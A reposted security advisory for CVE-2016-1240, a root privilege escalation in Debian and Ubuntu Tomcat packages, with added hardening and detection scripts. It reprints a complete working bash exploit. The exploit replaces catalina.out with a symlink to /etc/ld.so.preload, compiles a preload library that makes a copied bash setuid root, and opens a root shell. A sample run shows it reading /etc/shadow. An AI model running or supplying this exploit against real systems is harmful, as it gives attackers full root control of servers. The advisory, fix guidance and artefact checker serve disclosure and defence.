Vulnerability alert: Tomcat local privilege escalation (CVE-2016-1240, PoC included)

Summary

On October 1 a local privilege escalation vulnerability affecting Tomcat, CVE-2016-1240, was disclosed. The flaw is in the Debian and Ubuntu Tomcat packages rather than in Tomcat itself: starting from nothing more than the low-privileged tomcat user, an attacker can obtain root on the system. Exploitation is not difficult, so affected users should pay close attention.






Author's QQ: 381493251
Blog: www.abcdocker.com
WeChat public account: abcdocker
Abcdocker discussion group: 454666672
If you run into problems you are welcome to ask in the group; we are a community that likes to help!

  Tomcat is an application server that runs Servlet/JSP web applications. It is often described as an extension of Apache httpd because it is so frequently deployed behind it, but it is a standalone server and runs perfectly well without Apache.
CVE ID:

CVE-2016-1240

Affected versions (Debian package versions):

  1. Tomcat 8 <= 8.0.36-2
  2. Tomcat 7 <= 7.0.70-2
  3. Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

Affected systems include Debian and Ubuntu; other distributions that ship the corresponding deb packages may also be affected.

Fix:
The Debian security team has fixed the affected packages; updating to the latest Tomcat packages provided by the distribution is sufficient.

Vulnerability overview:
  Administrators of Debian-based Linux systems normally manage software with apt-get. CVE-2016-1240 is a problem in the Tomcat deb packages: installing Tomcat from the package also installs an init script, /etc/init.d/tomcatN (tomcat6, tomcat7 or tomcat8), that runs as root. By abusing that script, an attacker holding only the low-privileged tomcat user can obtain root on the system. The relevant lines of the script are:

  # Run the catalina.sh script as a daemon
  set +e
  touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
  chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

A local attacker running as the tomcat user (for example after compromising a web application) can replace catalina.out with a symlink pointing at an arbitrary system file; this is possible because the log directory itself belongs to the tomcat user, so the attacker may delete and recreate entries in it. When the init script, which runs as root, touches and chowns catalina.out again on the next service restart, both commands follow the symlink, and the attacker becomes the owner of the target file. Ownership of /etc/ld.so.preload (or of /etc/default/locale, which the daily log-rotation cron job sources as root) is enough to obtain root.
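The two script lines above are the whole bug: both touch(1) and chown(1) dereference symlinks. The following added example, which is not part of the advisory, the PoC or Debian's packaging, puts that pattern next to a hardened variant and includes a self-contained demo that plants a symlink the way the exploit does. The function names, the temporary-directory fixture and the use of the current user in place of the tomcat user are assumptions made for the demo.

```sh
#!/bin/sh
# Added example, not from the advisory or Debian's init scripts.
# Assumed names: prepare_log_vulnerable, prepare_log_hardened, demo_symlink_attack.

# The pattern from /etc/init.d/tomcat7 on affected packages. Both touch(1)
# and chown(1) dereference symlinks, so if catalina.out has been replaced by
# a link, root creates the link target (if missing) and hands its ownership
# to the service user.
prepare_log_vulnerable() {
    log="$1" user="$2"
    touch "$log"
    chown "$user" "$log"
}

# Hardened variant: refuse a symlink, create a missing file with O_EXCL so a
# link planted between the check and the open fails instead of being
# followed, and chown the path itself (-h), never its target. Creating the
# log as the unprivileged user (start-stop-daemon --chuid, or
# su -s /bin/sh "$user" -c 'touch ...') is stronger still, because root then
# never opens a path the attacker controls; it needs a real second user, so
# it is left out of this demo.
prepare_log_hardened() {
    log="$1" user="$2"
    if [ -L "$log" ]; then
        echo "refusing: $log is a symbolic link" >&2
        return 1
    fi
    if [ ! -e "$log" ]; then
        # noclobber makes '>' open with O_CREAT|O_EXCL
        ( set -C; : > "$log" ) 2>/dev/null || return 1
    elif [ ! -f "$log" ]; then
        echo "refusing: $log is not a regular file" >&2
        return 1
    fi
    chown -h "$user" "$log"
}

# Demo standing in for the exploit: a "protected" file plays /etc/ld.so.preload
# and the current user plays tomcat. Prints three fields:
#   <target created by vulnerable> <hardened exit code> <target created by hardened>
demo_symlink_attack() {
    tmp=$(mktemp -d)
    target="$tmp/protected_file"
    log="$tmp/catalina.out"
    me=$(id -un)

    # what the PoC does: rm -f catalina.out && ln -s /etc/ld.so.preload catalina.out
    ln -s "$target" "$log"

    prepare_log_vulnerable "$log" "$me" 2>/dev/null
    vuln_created=0
    [ -f "$target" ] && vuln_created=1

    rm -f "$target"
    hard_rc=0
    prepare_log_hardened "$log" "$me" 2>/dev/null || hard_rc=$?
    hard_created=0
    [ -e "$target" ] && hard_created=1

    rm -rf "$tmp"
    echo "$vuln_created $hard_rc $hard_created"
}

demo_symlink_attack   # prints: 1 1 0
```

The vulnerable function creates the link target through the symlink and chowns it; the hardened one refuses before touching anything. Note that the check-then-create sequence still has a window, which is why the O_EXCL open and `chown -h` are there: a link planted inside that window makes the open fail rather than succeed on the target.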

PoC:

  #!/bin/bash
  #
  # Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  #
  # CVE-2016-1240
  #
  # Discovered and coded by:
  #
  # Dawid Golunski
  # http://legalhackers.com
  #
  # This exploit targets Tomcat (versions 6, 7 and 8) packaging on
  # Debian-based distros including Debian, Ubuntu etc.
  # It allows attackers with a tomcat shell (e.g. obtained remotely through a
  # vulnerable java webapp, or locally via weak permissions on webapps in the
  # Tomcat webroot directories etc.) to escalate their privileges to root.
  #
  # Usage:
  # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
  #
  # The exploit can be used in two ways:
  #
  # -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
  # gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
  # It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
  # a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
  #
  # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
  # /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
  # Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
  # Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
  # then add arbitrary commands to the file which will be executed with root privileges by
  # the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
  # Ubuntu/Debian Tomcat installations).
  #
  # See full advisory for details at:
  # http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
  #
  # Disclaimer:
  # For testing purposes only. Do no harm.
  #

  BACKDOORSH="/bin/bash"
  BACKDOORPATH="/tmp/tomcatrootsh"
  PRIVESCLIB="/tmp/privesclib.so"
  PRIVESCSRC="/tmp/privesclib.c"
  SUIDBIN="/usr/bin/sudo"

  function cleanexit {
      # Cleanup
      echo -e "\n[+] Cleaning up..."
      rm -f $PRIVESCSRC
      rm -f $PRIVESCLIB
      rm -f $TOMCATLOG
      touch $TOMCATLOG
      if [ -f /etc/ld.so.preload ]; then
          echo -n > /etc/ld.so.preload 2>/dev/null
      fi
      echo -e "\n[+] Job done. Exiting with code $1 \n"
      exit $1
  }

  function ctrl_c() {
      echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
      cleanexit 0
  }

  #intro
  echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
  echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

  # Args
  if [ $# -lt 1 ]; then
      echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
      exit 3
  fi
  if [ "$2" = "-deferred" ]; then
      mode="deferred"
  else
      mode="active"
  fi

  # Priv check
  echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
  id | grep -q tomcat
  if [ $? -ne 0 ]; then
      echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
      exit 3
  fi

  # Set target paths
  TOMCATLOG="$1"
  if [ ! -f $TOMCATLOG ]; then
      echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
      exit 3
  fi
  echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

  # [ Deferred exploitation ]
  # Symlink the log file to /etc/default/locale file which gets executed daily on default
  # tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
  # Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
  # restarted and file owner gets changed.
  if [ "$mode" = "deferred" ]; then
      rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
      if [ $? -ne 0 ]; then
          echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
          cleanexit 3
      fi
      echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
      echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
      echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
      echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"
      echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n"
      exit 0
  fi

  # [ Active exploitation ]
  trap ctrl_c INT

  # Compile privesc preload library
  echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
  cat <<_solibeof_>$PRIVESCSRC
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <dlfcn.h>
  uid_t geteuid(void) {
      static uid_t (*old_geteuid)();
      old_geteuid = dlsym(RTLD_NEXT, "geteuid");
      if ( old_geteuid() == 0 ) {
          chown("$BACKDOORPATH", 0, 0);
          chmod("$BACKDOORPATH", 04777);
          unlink("/etc/ld.so.preload");
      }
      return old_geteuid();
  }
  _solibeof_
  gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
  if [ $? -ne 0 ]; then
      echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
      cleanexit 2
  fi

  # Prepare backdoor shell
  cp $BACKDOORSH $BACKDOORPATH
  echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

  # Safety check
  if [ -f /etc/ld.so.preload ]; then
      echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
      cleanexit 2
  fi

  # Symlink the log file to ld.so.preload
  rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
  if [ $? -ne 0 ]; then
      echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
      cleanexit 3
  fi
  echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

  # Wait for Tomcat to re-open the logs
  echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
  echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\n"
  while :; do
      sleep 0.1
      if [ -f /etc/ld.so.preload ]; then
          echo $PRIVESCLIB > /etc/ld.so.preload
          break
      fi
  done

  # /etc/ld.so.preload file should be owned by tomcat user at this point
  # Inject the privesc.so shared library to escalate privileges
  echo $PRIVESCLIB > /etc/ld.so.preload
  echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
  echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
  echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

  # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
  echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
  sudo --help 2>/dev/null >/dev/null

  # Check for the rootshell
  ls -l $BACKDOORPATH | grep rws | grep -q root
  if [ $? -eq 0 ]; then
      echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
      echo -e "\n\033[94mPlease tell me you're seeing this too ;)\033[0m"
  else
      echo -e "\n[!] Failed to get root"
      cleanexit 2
  fi

  # Execute the rootshell
  echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
  $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
  $BACKDOORPATH -p

  # Job done.
  cleanexit 0

PoC run example:

  tomcat7@ubuntu:/tmp$ id
  uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  tomcat7@ubuntu:/tmp$ lsb_release -a
  No LSB modules are available.
  Distributor ID: Ubuntu
  Description: Ubuntu 16.04 LTS
  Release: 16.04
  Codename: xenial
  tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
  ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
  ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
  ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
  tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out
  Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  CVE-2016-1240
  Discovered and coded by:
  Dawid Golunski
  http://legalhackers.com
  [+] Starting the exploit in [active] mode with the following privileges:
  uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
  [+] Compiling the privesc shared library (/tmp/privesclib.c)
  [+] Backdoor/low-priv shell installed at:
  -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  [+] Symlink created at:
  lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
  [+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
  You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
  [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
  -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
  [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
  [+] The /etc/ld.so.preload file now contains:
  /tmp/privesclib.so
  [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
  [+] Rootshell got assigned root SUID perms at:
  -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  Please tell me you're seeing this too ;)
  [+] Executing the rootshell /tmp/tomcatrootsh now!
  tomcatrootsh-4.3# id
  uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
  tomcatrootsh-4.3# whoami
  root
  tomcatrootsh-4.3# head -n3 /etc/shadow
  root:$6$oaf[cut]:16912:0:99999:7:::
  daemon:*:16912:0:99999:7:::
  bin:*:16912:0:99999:7:::
  tomcatrootsh-4.3# exit
  exit
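For defenders, the two PoC modes shown above leave a small and specific set of artefacts: a catalina.out that is a symlink, an /etc/ld.so.preload that a stock install does not have (pointing into /tmp in active mode), an /etc/default/locale no longer owned by root (deferred mode), and a setuid shell in a temp directory. The following added checker, which is not part of the advisory or the PoC, looks for exactly those. It takes a path prefix so it can be pointed at a mounted image or a test fixture; the function name, the finding tags and the default log locations are assumptions (adjust TOMCAT_LOGS for a non-default CATALINA_BASE).

```sh
#!/bin/sh
# Added example, not from the advisory or the PoC: check a host (or an image
# mounted under a prefix) for the artefacts CVE-2016-1240 exploitation leaves.
# Assumed: function name, finding tags, default Debian/Ubuntu log locations.
TOMCAT_LOGS="/var/log/tomcat6/catalina.out /var/log/tomcat7/catalina.out /var/log/tomcat8/catalina.out"

# Usage: check_cve_2016_1240 [prefix]   (prefix "" or omitted = live system)
# Prints one tagged line per finding plus a FINDINGS summary; returns 0 only
# when nothing was found.
check_cve_2016_1240() {
    root="${1:-}"
    findings=0

    # 1. catalina.out replaced by a symlink: both PoC modes do rm -f + ln -s.
    for f in $TOMCAT_LOGS; do
        if [ -L "$root$f" ]; then
            echo "SYMLINK_LOG $f -> $(readlink "$root$f")"
            findings=$((findings + 1))
        fi
    done

    # 2. /etc/ld.so.preload: absent on a stock install, so its presence alone
    #    is worth a look; an entry under a temp dir is the active-mode payload.
    p="$root/etc/ld.so.preload"
    if [ -e "$p" ]; then
        echo "PRELOAD_PRESENT $(ls -l "$p")"
        findings=$((findings + 1))
        while IFS= read -r lib || [ -n "$lib" ]; do
            case "$lib" in
                /tmp/*|/var/tmp/*|/dev/shm/*)
                    echo "PRELOAD_UNTRUSTED $lib"
                    findings=$((findings + 1)) ;;
            esac
        done < "$p"
    fi

    # 3. Deferred mode: /etc/default/locale chowned to tomcat, while
    #    /etc/cron.daily/tomcatN still sources it as root.
    l="$root/etc/default/locale"
    if [ -e "$l" ] && [ -n "$(find "$l" -maxdepth 0 ! -user root 2>/dev/null)" ]; then
        echo "LOCALE_NOT_ROOT $(ls -l "$l")"
        findings=$((findings + 1))
    fi

    # 4. Setuid binaries in temp dirs: the PoC drops a setuid copy of bash there.
    #    (Word-splitting on find output; fine for these directories.)
    for d in /tmp /var/tmp /dev/shm; do
        [ -d "$root$d" ] || continue
        for s in $(find "$root$d" -maxdepth 1 -type f -perm -4000 2>/dev/null); do
            echo "SUID_IN_TMP $(ls -l "$s")"
            findings=$((findings + 1))
        done
    done

    echo "FINDINGS $findings"
    [ "$findings" -eq 0 ]
}

# When run directly, check the live system (or the prefix given as $1).
check_cve_2016_1240 "$@"
```

A clean system prints only `FINDINGS 0`. Any SYMLINK_LOG or PRELOAD_UNTRUSTED line is a strong signal on its own; LOCALE_NOT_ROOT and SUID_IN_TMP are the traces the deferred mode and the dropped root shell leave behind even after the symlink has been cleaned up.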

*Compiled by the Vulbox (漏洞盒子) security team; source: Twitter. Please credit FreeBuf.COM when reposting.
Original article: http://www.freebuf.com/vuls/115862.html?spm=5176.2020520154.sas.14.Ha4Thk